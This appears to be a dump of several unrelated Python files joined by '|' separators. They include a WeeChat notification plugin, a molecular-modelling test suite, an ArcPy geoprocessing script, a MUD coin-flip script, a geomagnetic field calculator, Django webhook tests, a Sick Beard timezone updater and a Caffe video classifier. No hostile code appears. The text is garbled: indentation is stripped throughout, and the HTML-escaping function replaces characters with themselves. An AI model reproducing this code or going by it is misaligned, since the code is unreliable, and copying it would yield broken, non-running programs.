# Option notify_on_all_messages_in_buffers_that_match:
for pattern in buffer_patterns_to_notify_on_all_messages():
for buf in buffer_names:
if re.search(pattern, buf):
return True
return False
def buffer_patterns_to_hide_messages():
"""A generator of buffer-name patterns in which the user wants to hide
messages.
"""
for pattern in split_option_value('hide_messages_in_buffers_that_match'):
yield pattern
def hide_message_in_buffer(buffer):
"""Should we hide messages in the given buffer?"""
buffer_names = names_for_buffer(buffer)
for pattern in buffer_patterns_to_hide_messages():
for buf in buffer_names:
if re.search(pattern, buf):
return True
return False
def prepare_notification(buffer, nick, message):
"""Prepares a notification from the given data."""
if is_private_message(buffer):
source = nick
else:
source = (weechat.buffer_get_string(buffer, 'short_name') or
weechat.buffer_get_string(buffer, 'name'))
message = nick + nick_separator() + message
if hide_message_in_buffer(buffer):
message = ''
max_length = int(weechat.config_get_plugin('max_length'))
if max_length > 0:
ellipsis = weechat.config_get_plugin('ellipsis')
message = shorten_message(message, max_length, ellipsis)
if weechat.config_get_plugin('escape_html') == 'on':
message = escape_html(message)
message = escape_slashes(message)
icon = weechat.config_get_plugin('icon')
desktop_entry = weechat.config_get_plugin('desktop_entry')
timeout = weechat.config_get_plugin('timeout')
transient = should_notifications_be_transient()
urgency = weechat.config_get_plugin('urgency')
return Notification(source, message, icon, desktop_entry, timeout, transient, urgency)
def should_notifications_be_transient():
"""Should the sent notifications be transient, i.e. should they be removed
from the notification bar once they expire or are dismissed?
"""
return weechat.config_get_plugin('transient') == 'on'
def nick_separator():
"""Returns a nick separator to be used."""
separator = weechat.config_get_plugin('nick_separator')
return separator if separator else default_value_of('nick_separator')
def shorten_message(message, max_length, ellipsis):
"""Shortens the message to at most max_length characters by using the given
ellipsis.
"""
# In Python 2, we need to decode the message and ellipsis into Unicode to
# correctly (1) detect their length and (2) shorten the message. Failing to
# do that could make the shortened message invalid and cause notify-send to
# fail. For example, when we have bytes, we cannot guarantee that we do not
# split the message inside of a multibyte character.
if sys.version_info.major == 2:
try:
message = message.decode('utf-8')
ellipsis = ellipsis.decode('utf-8')
except UnicodeDecodeError:
# Either (or both) of the two cannot be decoded. Continue in a
# best-effort manner.
pass
message = shorten_unicode_message(message, max_length, ellipsis)
if sys.version_info.major == 2:
if not isinstance(message, str):
message = message.encode('utf-8')
return message
def shorten_unicode_message(message, max_length, ellipsis):
"""An internal specialized version of shorten_message() when the both the
message and ellipsis are str (in Python 3) or unicode (in Python 2).
"""
if max_length <= 0 or len(message) <= max_length:
# Nothing to shorten.
return message
if len(ellipsis) >= max_length:
# We cannot include any part of the message.
return ellipsis[:max_length]
return message[:max_length - len(ellipsis)] + ellipsis
def escape_html(message):
"""Escapes HTML characters in the given message."""
# Only the following characters need to be escaped
# (https://wiki.ubuntu.com/NotificationDevelopmentGuidelines).
message = message.replace('&', '&')
message = message.replace('<', '<')
message = message.replace('>', '>')
return message
def escape_slashes(message):
"""Escapes slashes in the given message."""
# We need to escape backslashes to prevent notify-send from interpreting
# them, e.g. we do not want to print a newline when the message contains
# '\n'.
return message.replace('\\', r'\\')
def send_notification(notification):
"""Sends the given notification to the user."""
notify_cmd = ['notify-send', '--app-name', 'weechat']
if notification.icon:
notify_cmd += ['--icon', notification.icon]
if notification.desktop_entry:
notify_cmd += ['--hint', 'string:desktop-entry:{}'.format(notification.desktop_entry)]
if notification.timeout:
notify_cmd += ['--expire-time', str(notification.timeout)]
if notification.transient:
notify_cmd += ['--hint', 'int:transient:1']
if notification.urgency:
notify_cmd += ['--urgency', notification.urgency]
# We need to add '--' before the source and message to ensure that
# notify-send considers the remaining parameters as the source and the
# message. This prevents errors when a source or message starts with '--'.
notify_cmd += [
'--',
# notify-send fails with "No summary specified." when no source is
# specified, so ensure that there is always a non-empty source.
notification.source or '-',
notification.message
]
# Prevent notify-send from messing up the WeeChat screen when occasionally
# emitting assertion messages by redirecting the output to /dev/null (users
# would need to run /redraw to fix the screen).
# In Python < 3.3, there is no subprocess.DEVNULL, so we have to use a
# workaround.
with open(os.devnull, 'wb') as devnull:
try:
subprocess.check_call(
notify_cmd,
stderr=subprocess.STDOUT,
stdout=devnull,
)
except Exception as ex:
error_message = '{} (reason: {!r}). {}'.format(
'Failed to send the notification via notify-send',
'{}: {}'.format(ex.__class__.__name__, ex),
'Ensure that you have notify-send installed in your system.',
)
print(error_message, file=sys.stderr)
if __name__ == '__main__':
# Registration.
weechat.register(
SCRIPT_NAME,
SCRIPT_AUTHOR,
SCRIPT_VERSION,
SCRIPT_LICENSE,
SCRIPT_DESC,
SCRIPT_SHUTDOWN_FUNC,
SCRIPT_CHARSET
)
# Initialization.
for option, (default_value, description) in OPTIONS.items():
description = add_default_value_to(description, default_value)
weechat.config_set_desc_plugin(option, description)
if not weechat.config_is_set_plugin(option):
weechat.config_set_plugin(option, default_value)
# Catch all messages on all buffers and strip colors from them before
# passing them into the callback.
weechat.hook_print('', '', '', 1, 'message_printed_callback', '')
|
import unittest
import subprocess
import os
import logging
import numpy as np
from simpletraj.trajectory import XtcTrajectory
try:
import mdtraj
mdtraj_present = True
except ImportError:
mdtraj_present = False
from pycgtool.interface import Options
from pycgtool.util import cmp_whitespace_float
from pycgtool.pycgtool import main, map_only
class Args:
def __init__(self, name, map=True, bnd=True):
self.gro = os.path.join("test/data", name+".gro")
self.xtc = os.path.join("test/data", name+".xtc")
self.map = os.path.join("test/data", name+".map") if map else None
self.bnd = os.path.join("test/data", name+".bnd") if bnd else None
self.begin = 0
self.end = -1
self.quiet = True
class PycgtoolTest(unittest.TestCase):
config = Options([("output_name", "out"),
("output", "gro"),
("output_xtc", True),
("map_only", False),
("map_center", "geom"),
("constr_threshold", 100000),
("dump_measurements", False),
("dump_n_values", 10000),
("output_forcefield", False),
("temperature", 310),
("default_fc", False),
("generate_angles", True),
("generate_dihedrals", False)])
def test_run_help(self):
path = os.path.dirname(os.path.dirname(__file__))
self.assertEqual(0, subprocess.check_call([os.path.join(path, "pycgtool.py"), "-h"], stdout=subprocess.PIPE))
@unittest.skipIf(not mdtraj_present, "MDTRAJ or Scipy not present")
def test_map_only(self):
logging.disable(logging.WARNING)
map_only(Args("sugar"), self.config)
logging.disable(logging.NOTSET)
xtc = XtcTrajectory("out.xtc")
xtc_ref = XtcTrajectory("test/data/sugar_out.xtc")
self.assertEqual(xtc_ref.numframes, xtc.numframes)
for i in range(xtc_ref.numframes):
xtc.get_frame(i)
xtc_ref.get_frame(i)
np.testing.assert_array_almost_equal(xtc_ref.box, xtc.box, decimal=3)
np.testing.assert_array_almost_equal(xtc_ref.x, xtc.x, decimal=3)
def test_full(self):
path = os.path.dirname(os.path.dirname(__file__))
self.assertEqual(0, subprocess.check_call([os.path.join(path, "pycgtool.py"),
"-g", "test/data/sugar.gro",
"-x", "test/data/sugar.xtc",
"-m", "test/data/sugar_only.map",
"-b", "test/data/sugar.bnd",
], stdout=subprocess.PIPE, stderr=subprocess.PIPE))
self.assertTrue(cmp_whitespace_float("out.itp", "test/data/sugar_out.itp", float_rel_error=0.001))
self.assertTrue(cmp_whitespace_float("out.gro", "test/data/sugar_out.gro", float_rel_error=0.001))
# TODO more tests
if __name__ == '__main__':
unittest.main()
|
import os, sys, math, traceback
import arcpy
DEBUG = False
deleteme = []
arcpy.env.overwriteOutput = True
if DEBUG == True:
arcpy.AddMessage("Using scratch GDB of: " + arcpy.env.scratchWorkspace)
# Read in the Parameters
baseFeatureClass = arcpy.GetParameterAsText(0)
obstructionFeatureClasses = arcpy.GetParameterAsText(1)
templateFeatureClass = arcpy.GetParameterAsText(2)
eraseOutputFeatureClass = os.path.join(arcpy.env.scratchWorkspace, "temperase")
unionedFeatureClass = os.path.join(arcpy.env.scratchWorkspace, "tempunion")
splitObstructionFeatureClasses = obstructionFeatureClasses.split(";")
numFC = len(splitObstructionFeatureClasses)
# Union together the obstructions and then erase them
if obstructionFeatureClasses != "" and numFC > 0:
arcpy.AddMessage( str(numFC) + " feature class(es) provided")
# create a value table
vtab = arcpy.ValueTable(2)
vtab.loadFromString(obstructionFeatureClasses)
# union
arcpy.AddMessage("unionedFeatureClass: " + unionedFeatureClass)
arcpy.Union_analysis(vtab, unionedFeatureClass)
deleteme.append(unionedFeatureClass)
deleteme.append(eraseOutputFeatureClass)
# Erase
arcpy.Erase_analysis(baseFeatureClass, unionedFeatureClass, eraseOutputFeatureClass)
arcpy.CopyFeatures_management(eraseOutputFeatureClass, templateFeatureClass)
if DEBUG == True:
arcpy.AddMessage("Features copied from union to template")
else:
if DEBUG == True:
arcpy.AddMessage("No obstructions, returning base feature class.")
arcpy.CopyFeatures_management(baseFeatureClass, templateFeatureClass)
if DEBUG == True:
arcpy.AddMessage("Features copied from base to template.")
for i in deleteme:
if DEBUG == True:
arcpy.AddMessage("Removing: " + str(i))
arcpy.Delete_management(i)
arcpy.SetParameter(3,"true")
|
# -*- coding: utf-8 -*-
#= IMPORT ======================================================================
import random
from src.log import log
from src.enums import TO
#= FUNZIONI ====================================================================
def after_drop(entity, coin, room, behavioured):
if not entity:
log.bug("entity non è un parametro valido: %r" % entity)
return
if not coin:
log.bug("coin non è un parametro valido: %r" % coin)
return
if not room:
log.bug("room non è un parametro valido: %r" % room)
return
heads_or_tails(coin)
entity.act("Fai volteggiare $N fino a terra", TO.ENTITY, coin)
entity.act("$n fa voteggiare te povero $N", TO.TARGET, coin)
entity.act("$n fa volteggiare $N fino a terra", TO.OTHERS, coin)
coin = coin.from_location(1)
coin = coin.to_location(room, 1)
return True
#- Fine Funzione -
def after_inject(coin, room):
if not coin:
log.bug("coin non è un parametro valido: %r" % coin)
return
coin.long = "$N è caduta in piedi!"
#- Fine Funzione -
def after_reset(coin):
if not coin:
log.bug("coin non è un parametro valido: %r" % coin)
return
coin.long = "$N è caduta in piedi!"
#- Fine Funzione -
def heads_or_tails(coin):
if not coin:
log.bug("coin non è un parametro valido: %r" % coin)
return
number = random.randint(0, 200)
if number == 0:
coin.long = "$N è caduta in piedi!"
elif number % 2 == 0:
coin.long = "$N cadendo ha segnato testa."
else:
coin.long = "$N cadendo ha segnato croce."
#- Fine Funzione -
|
#!/usr/bin/env python
from __future__ import print_function
from builtins import input
import sys
import matplotlib
if matplotlib.get_backend() != "TKAgg":
matplotlib.use("TKAgg")
import numpy
import pmagpy.pmag as pmag
#
def main():
"""
NAME
igrf.py
DESCRIPTION
This program calculates igrf field values
using the routine of Malin and Barraclough (1981)
based on d/igrfs from 1900 to 2010.
between 1900 and 1000BCE, it uses CALS3K.4, ARCH3K.1
Prior to 1000BCE, it uses PFM9k or CALS10k-4b
Calculates reference field vector at specified location and time.
SYNTAX
igrf.py [-h] [-i] -f FILE [< filename]
OPTIONS:
-h prints help message and quits
-i for interactive data entry
-f FILE specify file name with input data
-F FILE specify output file name
-ages MIN MAX INCR: specify age minimum in years (+/- AD), maximum and increment, default is line by line
-loc LAT LON; specify location, default is line by line
-alt ALT; specify altitude in km, default is sealevel (0)
-plt; make a plot of the time series
-sav, saves plot and quits
-fmt [pdf,jpg,eps,svg] specify format for output figure (default is svg)
-mod [arch3k,cals3k,pfm9k,hfm10k,cals10k_2,shadif14k,cals10k] specify model for 3ka to 1900 AD, default is cals10k
NB: program uses IGRF12 for dates 1900 to 2015.
INPUT FORMAT
interactive entry:
date: decimal year
alt: altitude in km
lat: positive north
lon: positive east
for file entry:
space delimited string: date alt lat long
OUTPUT FORMAT
Declination Inclination Intensity (nT) date alt lat long
MODELS: ARCH3K: (Korte et al., 2009);CALS3K (Korte & Contable, 2011); CALS10k (is .1b of Korte et al., 2011); PFM9K (Nilsson et al., 2014); HFM10k (is HFM.OL1.A1 of Constable et al., 2016); CALS10k_2 (is cals10k.2 of Constable et al., 2016), SHADIF14k (SHA.DIF.14K of Pavon-Carrasco et al., 2014).
"""
plot,fmt=0,'svg'
plt=0
if '-fmt' in sys.argv:
ind=sys.argv.index('-fmt')
fmt=sys.argv[ind+1]
if len(sys.argv)!=0 and '-h' in sys.argv:
print(main.__doc__)
sys.exit()
if '-mod' in sys.argv:
ind=sys.argv.index('-mod')
mod=sys.argv[ind+1]
else: mod='cals10k'
if '-f' in sys.argv:
ind=sys.argv.index('-f')
file=sys.argv[ind+1]
input=numpy.loadtxt(file)
elif '-i' in sys.argv:
while 1:
try:
line=[]
line.append(float(input("Decimal year: <cntrl-D to quit> ")))
alt=input("Elevation in km [0] ")
if alt=="":alt="0"
line.append(float(alt))
line.append(float(input("Latitude (positive north) ")))
line.append(float(input("Longitude (positive east) ")))
if mod=='':
x,y,z,f=pmag.doigrf(line[3]%360.,line[2],line[1],line[0])
else:
x,y,z,f=pmag.doigrf(line[3]%360.,line[2],line[1],line[0],mod=mod)
Dir=pmag.cart2dir((x,y,z))
print('%8.2f %8.2f %8.0f'%(Dir[0],Dir[1],f))
except EOFError:
print("\n Good-bye\n")
sys.exit()
elif '-ages' in sys.argv:
ind=sys.argv.index('-ages')
agemin=float(sys.argv[ind+1])
agemax=float(sys.argv[ind+2])
ageincr=float(sys.argv[ind+3])
if '-loc' in sys.argv:
ind=sys.argv.index('-loc')
lat=float(sys.argv[ind+1])
lon=float(sys.argv[ind+2])
else:
print("must specify lat/lon if using age range option")
sys.exit()
if '-alt' in sys.argv:
ind=sys.argv.index('-alt')
alt=float(sys.argv[ind+1])
else: alt=0
ages=numpy.arange(agemin,agemax,ageincr)
lats=numpy.ones(len(ages))*lat
lons=numpy.ones(len(ages))*lon
alts=numpy.ones(len(ages))*alt
input=numpy.array([ages,alts,lats,lons]).transpose()
else:
input=numpy.loadtxt(sys.stdin,dtype=numpy.float)
if '-F' in sys.argv:
ind=sys.argv.index('-F')
outfile=sys.argv[ind+1]
out=open(outfile,'w')
else:outfile=""
if '-sav' in sys.argv:plot=1
if '-plt' in sys.argv:
plt=1
import matplotlib
matplotlib.use("TkAgg")
import pylab
pylab.ion()
Ages,Decs,Incs,Ints,VADMs=[],[],[],[],[]
for line in input:
#if mod=='':
# x,y,z,f=pmag.doigrf(line[3]%360.,line[2],line[1],line[0])
#else:
# x,y,z,f=pmag.doigrf(line[3]%360.,line[2],line[1],line[0],mod=mod)
x,y,z,f=pmag.doigrf(line[3]%360.,line[2],line[1],line[0],mod=mod)
Dir=pmag.cart2dir((x,y,z))
if outfile!="":
out.write('%8.2f %8.2f %8.0f %7.1f %7.1f %7.1f %7.1f\n'%(Dir[0],Dir[1],f,line[0],line[1],line[2],line[3]))
elif plt:
Ages.append(line[0])
if Dir[0]>180: Dir[0]=Dir[0]-360.0
Decs.append(Dir[0])
Incs.append(Dir[1])
Ints.append(f*1e-3)
VADMs.append(pmag.b_vdm(f*1e-9,line[2])*1e-21)
else:
print('%8.2f %8.2f %8.0f %7.1f %7.1f %7.1f %7.1f'%(Dir[0],Dir[1],f,line[0],line[1],line[2],line[3]))
if plt:
fig=pylab.figure(num=1,figsize=(7,9))
fig.add_subplot(411)
pylab.plot(Ages,Decs)
pylab.ylabel('Declination ($^{\circ}$)')
fig.add_subplot(412)
pylab.plot(Ages,Incs)
pylab.ylabel('Inclination ($^{\circ}$)')
fig.add_subplot(413)
pylab.plot(Ages,Ints)
pylab.ylabel('Intensity ($\mu$T)')
fig.add_subplot(414)
pylab.plot(Ages,VADMs)
pylab.ylabel('VADMs (ZAm$^2$)')
pylab.xlabel('Ages')
if plot==0:
pylab.draw()
ans=input("S[a]ve to save figure, <Return> to quit ")
if ans=='a':
pylab.savefig('igrf.'+fmt)
print('Figure saved as: ','igrf.'+fmt)
else:
pylab.savefig('igrf.'+fmt)
print('Figure saved as: ','igrf.'+fmt)
sys.exit()
if __name__ == "__main__":
main()
|
from base64 import b64encode
import hashlib
import hmac
import json
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.test import TestCase
from ..compat import b
from ..signals import webhook_event
from .utils import override_settings
class DjrillWebhookSecretMixinTests(TestCase):
"""
Test mixin used in optional Mandrill webhook support
"""
def test_missing_secret(self):
with self.assertRaises(ImproperlyConfigured):
self.client.get('/webhook/')
@override_settings(DJRILL_WEBHOOK_SECRET='abc123')
def test_incorrect_secret(self):
response = self.client.head('/webhook/?secret=wrong')
self.assertEqual(response.status_code, 403)
@override_settings(DJRILL_WEBHOOK_SECRET='abc123')
def test_default_secret_name(self):
response = self.client.head('/webhook/?secret=abc123')
self.assertEqual(response.status_code, 200)
@override_settings(DJRILL_WEBHOOK_SECRET='abc123', DJRILL_WEBHOOK_SECRET_NAME='verysecret')
def test_custom_secret_name(self):
response = self.client.head('/webhook/?verysecret=abc123')
self.assertEqual(response.status_code, 200)
@override_settings(DJRILL_WEBHOOK_SECRET='abc123',
DJRILL_WEBHOOK_SIGNATURE_KEY="signature")
class DjrillWebhookSignatureMixinTests(TestCase):
"""
Test mixin used in optional Mandrill webhook signature support
"""
def test_incorrect_settings(self):
with self.assertRaises(ImproperlyConfigured):
self.client.post('/webhook/?secret=abc123')
@override_settings(DJRILL_WEBHOOK_URL="/webhook/?secret=abc123",
DJRILL_WEBHOOK_SIGNATURE_KEY = "anothersignature")
def test_unauthorized(self):
response = self.client.post(settings.DJRILL_WEBHOOK_URL)
self.assertEqual(response.status_code, 403)
@override_settings(DJRILL_WEBHOOK_URL="/webhook/?secret=abc123")
def test_signature(self):
signature = hmac.new(key=b(settings.DJRILL_WEBHOOK_SIGNATURE_KEY),
msg=b(settings.DJRILL_WEBHOOK_URL+"mandrill_events[]"),
digestmod=hashlib.sha1)
hash_string = b64encode(signature.digest())
response = self.client.post('/webhook/?secret=abc123', data={"mandrill_events":"[]"},
**{"HTTP_X_MANDRILL_SIGNATURE": hash_string})
self.assertEqual(response.status_code, 200)
@override_settings(DJRILL_WEBHOOK_SECRET='abc123')
class DjrillWebhookViewTests(TestCase):
"""
Test optional Mandrill webhook view
"""
def test_head_request(self):
response = self.client.head('/webhook/?secret=abc123')
self.assertEqual(response.status_code, 200)
def test_post_request_invalid_json(self):
response = self.client.post('/webhook/?secret=abc123')
self.assertEqual(response.status_code, 400)
def test_post_request_valid_json(self):
response = self.client.post('/webhook/?secret=abc123', {
'mandrill_events': json.dumps([{"event": "send", "msg": {}}])
})
self.assertEqual(response.status_code, 200)
def test_webhook_send_signal(self):
self.signal_received_count = 0
test_event = {"event": "send", "msg": {}}
def my_callback(sender, event_type, data, **kwargs):
self.signal_received_count += 1
self.assertEqual(event_type, 'send')
self.assertEqual(data, test_event)
webhook_event.connect(my_callback)
response = self.client.post('/webhook/?secret=abc123', {
'mandrill_events': json.dumps([test_event])
})
self.assertEqual(response.status_code, 200)
self.assertEqual(self.signal_received_count, 1)
|
# Author: Nic Wolfe <[email protected]>
# URL: http://code.google.com/p/sickbeard/
#
# This file is part of Sick Beard.
#
# Sick Beard is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Sick Beard is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Sick Beard. If not, see <http://www.gnu.org/licenses/>.
from lib.dateutil import tz
import lib.dateutil.zoneinfo
from sickbeard import db
from sickbeard import helpers
from sickbeard import logger
from sickbeard import encodingKludge as ek
from os.path import basename, realpath, join, isfile
import os
import re
import datetime
# regex to parse time (12/24 hour format)
time_regex = re.compile(r"(\d{1,2}):(\d{2,2})( [PA]M)?\b", flags=re.IGNORECASE)
network_dict = None
sb_timezone = tz.tzlocal()
# helper to remove failed temp download
def _remove_zoneinfo_failed(filename):
try:
os.remove(filename)
except:
pass
# helper to remove old unneeded zoneinfo files
def _remove_old_zoneinfo():
if (lib.dateutil.zoneinfo.ZONEINFOFILE is not None):
cur_zoneinfo = ek.ek(basename, lib.dateutil.zoneinfo.ZONEINFOFILE)
else:
return
cur_file = ek.ek(realpath, u'lib/dateutil/zoneinfo/' + cur_zoneinfo)
for (path, dirs, files) in ek.ek(os.walk,ek.ek(realpath,u'lib/dateutil/zoneinfo/')):
for filename in files:
if filename.endswith('.tar.gz'):
file_w_path = ek.ek(join,path,filename)
if file_w_path != cur_file and ek.ek(isfile,file_w_path):
try:
os.remove(file_w_path)
logger.log(u"Delete unneeded old zoneinfo File: " + file_w_path)
except:
logger.log(u"Unable to delete: " + file_w_path,logger.ERROR)
# update the dateutil zoneinfo
def _update_zoneinfo():
global sb_timezone
sb_timezone = tz.tzlocal()
# now check if the zoneinfo needs update
url_zv = 'http://github.com/Prinz23/sb_network_timezones/raw/master/zoneinfo.txt'
url_data = helpers.getURL(url_zv)
if url_data is None:
# When urlData is None, trouble connecting to github
logger.log(u"Loading zoneinfo.txt failed. Unable to get URL: " + url_zv, logger.ERROR)
return
if (lib.dateutil.zoneinfo.ZONEINFOFILE is not None):
cur_zoneinfo = ek.ek(basename, lib.dateutil.zoneinfo.ZONEINFOFILE)
else:
cur_zoneinfo = None
(new_zoneinfo, zoneinfo_md5) = url_data.decode('utf-8').strip().rsplit(u' ')
if ((cur_zoneinfo is not None) and (new_zoneinfo == cur_zoneinfo)):
return
# now load the new zoneinfo
url_tar = u'http://github.com/Prinz23/sb_network_timezones/raw/master/' + new_zoneinfo
zonefile = ek.ek(realpath, u'lib/dateutil/zoneinfo/' + new_zoneinfo)
zonefile_tmp = re.sub(r"\.tar\.gz$",'.tmp', zonefile)
if (os.path.exists(zonefile_tmp)):
try:
os.remove(zonefile_tmp)
except:
logger.log(u"Unable to delete: " + zonefile_tmp,logger.ERROR)
return
if not helpers.download_file(url_tar, zonefile_tmp):
return
new_hash = str(helpers.md5_for_file(zonefile_tmp))
if (zoneinfo_md5.upper() == new_hash.upper()):
logger.log(u"Updating timezone info with new one: " + new_zoneinfo,logger.MESSAGE)
try:
# remove the old zoneinfo file
if (cur_zoneinfo is not None):
old_file = ek.ek(realpath, u'lib/dateutil/zoneinfo/' + cur_zoneinfo)
if (os.path.exists(old_file)):
os.remove(old_file)
# rename downloaded file
os.rename(zonefile_tmp,zonefile)
# load the new zoneinfo
reload(lib.dateutil.zoneinfo)
sb_timezone = tz.tzlocal()
except:
_remove_zoneinfo_failed(zonefile_tmp)
return
else:
_remove_zoneinfo_failed(zonefile_tmp)
logger.log(u"MD5 HASH doesn't match: " + zoneinfo_md5.upper() + ' File: ' + new_hash.upper(),logger.ERROR)
return
# update the network timezone table
def update_network_dict():
_remove_old_zoneinfo()
_update_zoneinfo()
d = {}
# network timezones are stored on github pages
url = 'http://github.com/Prinz23/sb_network_timezones/raw/master/network_timezones.txt'
url_data = helpers.getURL(url)
if url_data is None:
# When urlData is None, trouble connecting to github
logger.log(u"Loading Network Timezones update failed. Unable to get URL: " + url, logger.ERROR)
load_network_dict()
return
try:
for line in url_data.splitlines():
(key, val) = line.decode('utf-8').strip().rsplit(u':',1)
if key is None or val is None:
continue
d[key] = val
except (IOError, OSError):
pass
myDB = db.DBConnection("cache.db")
# load current network timezones
old_d = dict(myDB.select("SELECT * FROM network_timezones"))
# list of sql commands to update the network_timezones table
ql = []
for cur_d, cur_t in d.iteritems():
h_k = old_d.has_key(cur_d)
if h_k and cur_t != old_d[cur_d]:
# update old record
ql.append(["UPDATE network_timezones SET network_name=?, timezone=? WHERE network_name=?", [cur_d, cur_t, cur_d]])
elif not h_k:
# add new record
ql.append(["INSERT INTO network_timezones (network_name, timezone) VALUES (?,?)", [cur_d, cur_t]])
if h_k:
del old_d[cur_d]
# remove deleted records
if len(old_d) > 0:
L = list(va for va in old_d)
ql.append(["DELETE FROM network_timezones WHERE network_name IN ("+','.join(['?'] * len(L))+")", L])
# change all network timezone infos at once (much faster)
myDB.mass_action(ql)
load_network_dict()
# load network timezones from db into dict
def load_network_dict():
d = {}
try:
myDB = db.DBConnection("cache.db")
cur_network_list = myDB.select("SELECT * FROM network_timezones")
if cur_network_list is None or len(cur_network_list) < 1:
update_network_dict()
cur_network_list = myDB.select("SELECT * FROM network_timezones")
d = dict(cur_network_list)
except:
d = {}
global network_dict
network_dict = d
# get timezone of a network or return default timezone
def get_network_timezone(network, network_dict):
if network is None:
return sb_timezone
try:
return tz.gettz(network_dict[network])
except:
return sb_timezone
# parse date and time string into local time
def parse_date_time(d, t, network):
if network_dict is None:
load_network_dict()
mo = time_regex.search(t)
if mo is not None and len(mo.groups()) >= 2:
try:
hr = helpers.tryInt(mo.group(1))
m = helpers.tryInt(mo.group(2))
ap = mo.group(3)
# convert am/pm to 24 hour clock
if ap is not None:
if ap.lower() == u" pm" and hr != 12:
hr += 12
elif ap.lower() == u" am" and hr == 12:
hr -= 12
except:
hr = 0
m = 0
else:
hr = 0
m = 0
if hr < 0 or hr > 23 or m < 0 or m > 59:
hr = 0
m = 0
te = datetime.datetime.fromordinal(helpers.tryInt(d))
foreign_timezone = get_network_timezone(network, network_dict)
foreign_naive = datetime.datetime(te.year, te.month, te.day, hr, m, tzinfo=foreign_timezone)
try:
return foreign_naive.astimezone(sb_timezone)
except (ValueError):
return foreign_naive
def test_timeformat(t):
mo = time_regex.search(t)
if mo is None or len(mo.groups()) < 2:
return False
else:
return True
|
import numpy as np
import pickle
import cv2
import cv2.cv as cv
import time
import sys
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
from sklearn.externals import joblib
caffe_root = '/home/hayden/caffe-recurrent/' # this file is expected to be in {caffe_root}/examples
sys.path.insert(0, caffe_root + 'python')
import caffe
def main():
layers = ['pool5']
vid_path = '/media/hayden/Storage/DATASETS/SPORT/TENNIS01/VID/'
feat_path = '/media/hayden/Storage/DATASETS/SPORT/TENNIS01/FEATURES/VGG16/RAW/'
classifications_path = '/media/hayden/Storage/DATASETS/SPORT/TENNIS01/CLASSIFICATIONS/FC/001/'
classifier_path = '/media/hayden/Storage/DATASETS/SPORT/TENNIS01/MODELS/SVM2/'
video_name = 'AUSO_2014_M_SF_Nadal_Federer'
start = None # if none start from the beginning
end = None # if none end at end of video
fps = 1
max_frames_in_file = 25000 # so not massive files
# MODEL_FILE = '/media/hayden/Storage/DATASETS/SPORT/TENNIS01/MODELS/FC/001/VGG_Tennis_deploy.prototxt'
# PRETRAINED = '/media/hayden/Storage/DATASETS/SPORT/TENNIS01/MODELS/FC/001/VGG_Tennis_001_iter_20000.caffemodel'
MODEL_FILE = '/media/hayden/Storage/DATASETS/SPORT/TENNIS01/MODELS/FC/006/deploy.prototxt'
PRETRAINED = '/media/hayden/Storage/DATASETS/SPORT/TENNIS01/MODELS/FC/006/snapshot_iter_65900.caffemodel'
with open('/home/hayden/Desktop/val.txt') as f:
files = f.readlines()
print files[0]
print files[1]
blob = caffe.proto.caffe_pb2.BlobProto()
data = open('/media/hayden/Storage/DATASETS/SPORT/TENNIS01/MODELS/FC/006/mean.binaryproto', 'rb').read()
blob.ParseFromString(data)
arr = np.array(caffe.io.blobproto_to_array(blob))
print arr.shape # check the shape of arr
arr = arr[0]
print arr
print arr.shape
# cv2.imshow('v',arr)
# cv2.waitKey()
caffe.set_mode_gpu() # GPU MODE
net = caffe.Classifier(MODEL_FILE, PRETRAINED, image_dims=(512, 512), mean=arr)
for line in files:
line = line.split()
print line[1]
img = cv2.imread(line[0])
cv2.imshow('word',img)
cv2.waitKey()
#print img
scores = net.predict([img],oversample=False)
print scores
print np.argmax(scores)
print '----'
#
# classify(vid_path, video_name, classifications_path, feat_path, classifier_path, layers, start, end, fps, max_frames_in_file,net)
#######################################################################################################################
def classify(vid_path, video_name, classifications_path, feat_path, classifier_path, layers, start, end, fps, max_frames_in_file,net):
# load net and video to extract features
capture = cv2.VideoCapture(vid_path + video_name)
if start is not None:
capture.set(cv.CV_CAP_PROP_POS_FRAMES, start)
else:
start = 0
if end is None:
end = int(capture.get(cv.CV_CAP_PROP_FRAME_COUNT))
total = end-start
for layer in layers:
start_time = time.clock()
events = ['Nothing','Hit','Serve','Nadal','Federer','Forehand','Backhand']
labels = np.zeros((len(events),total),dtype=np.uint8)
# # load classifier
# classifier_names = ['OTHERvHITvSERVE', 'NADALvFEDERER', 'FOREHANDvBACKHAND']
# classifiers = []
# for classifier_name in classifier_names:
# print 'Loading Classifier: '+classifier_path+classifier_name+'_'+layer+'.pkl'
# classifiers.append(joblib.load(classifier_path+classifier_name+'_'+layer+'.pkl'))
# load features
for current in range(start,end):
if current%max_frames_in_file == 0:
a = current
if (current+max_frames_in_file)>int(capture.get(cv.CV_CAP_PROP_FRAME_COUNT)):
b = int(capture.get(cv.CV_CAP_PROP_FRAME_COUNT))
else:
b = current+max_frames_in_file
print 'Loading features: '+feat_path+video_name+'/'+layer+'_'+str(a)+'_'+str(b-1)
with open(feat_path+video_name+'/'+layer+'_'+str(a)+'_'+str(b-1), 'rb') as f:
features = pickle.load(f)
print '=============='
print current
test_features_in = np.reshape(features[int(current%max_frames_in_file)],(1,1,1,len(features[int(current%max_frames_in_file)])))
print net.predict(test_features_in,oversample=False)
# for c in range(len(classifier_names)):
# predicted_class = classifiers[c].predict([features[int(current%max_frames_in_file)]])[0]
# if c == 0:
# labels[predicted_class][current] = 1
# elif c == 1:
# labels[predicted_class+3][current] = 1
# elif c == 2:
# labels[predicted_class+5][current] = 1
# else:
# pass
if (current/float(total))*100 % 2 == 0:
tr=(total-current)/((1+current)/(time.clock()-start_time))
print 'Perc: %f; Overall Time Remaining: %02d:%02d:%02d;' % ((current/float(total))*100,int((tr/60)/60),int((tr/60)%60),int(tr%60))
# print 'Saving labels: '+classifications_path+video_name+'/'+layer
# with open(classifications_path+video_name+'/'+layer, 'wb') as f:
# pickle.dump(labels, f)
if __name__ == '__main__':
main()
|
"""Common utility functions."""
import os
def get_files(src, search_string):
"""
Return a list files.
Parameters
----------
src : str
abs path of directory to search in
search_string : str
search criteria, as in *dat for ls *dat
Returns
-------
files : list
